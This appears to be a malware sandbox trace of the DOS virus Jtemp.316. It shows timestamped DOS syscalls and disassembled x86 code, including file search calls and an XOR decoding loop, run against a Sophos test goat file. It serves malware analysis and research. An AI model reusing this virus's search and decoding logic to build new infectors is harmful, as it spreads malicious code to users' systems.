Sample viewer

vx.netlux.org/Virus.DOS.Jtemp.316

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:35.998140257Z 26 PC: 13e58 | Set disk transfer address
2018-12-17T22:34:35.999976618Z 44 PC: 13e5c | Get time
0x13e5c: and dh, 0x1f
0x13e5f: test dh, 7
0x13e62: jne 0x13e89
0x13e64: mov bl, dh
0x13e66: inc bl
0x13e68: mov cx, 0x27
0x13e6b: lea dx, word ptr [bp + 0x3e]
0x13e6e: mov ah, 0x4e
0x13e70: int 0x21
0x13e72: jb 0x13e89
0x13e74: dec bl
0x13e76: je 0x13e7e
0x13e78: mov ah, 0x4f
0x13e7a: int 0x21
0x13e7c: jae 0x13e74
0x13e7e: mov ax, word ptr [bp + 0x67]
0x13e81: sub ax, 4
0x13e84: mov word ptr [bp + 0x4b], ax
0x13e87: jae 0x13ec6
0x13e89: mov ah, 0x2c
2018-12-17T22:34:36.002407267Z 44 PC: 13e8d | Get time
0x13e8d: test dh, 2
0x13e90: jne 0x13ec5
0x13e92: lea si, word ptr [bp]
0x13e95: mov di, si
0x13e97: mov cx, 0x3e
0x13e9a: lodsb al, byte ptr [si]
0x13e9b: xor al, cl
0x13e9d: stosb byte ptr es:[di], al
0x13e9e: loop 0x13e9a
0x13ea0: lea dx, word ptr [bp + 0x1b]
0x13ea3: mov ah, 9
0x13ea5: int 0x21
0x13ea7: mov ah, 0x2a
0x13ea9: int 0x21
0x13eab: xor ah, ah
0x13ead: shl al, 1
0x13eaf: shl al, 1
0x13eb1: lea dx, word ptr [bp]
0x13eb4: add dx, ax
0x13eb6: mov ah, 9
2018-12-17T22:34:36.004883163Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:34:36.011260677Z 0 PC: 12a89 | Program terminate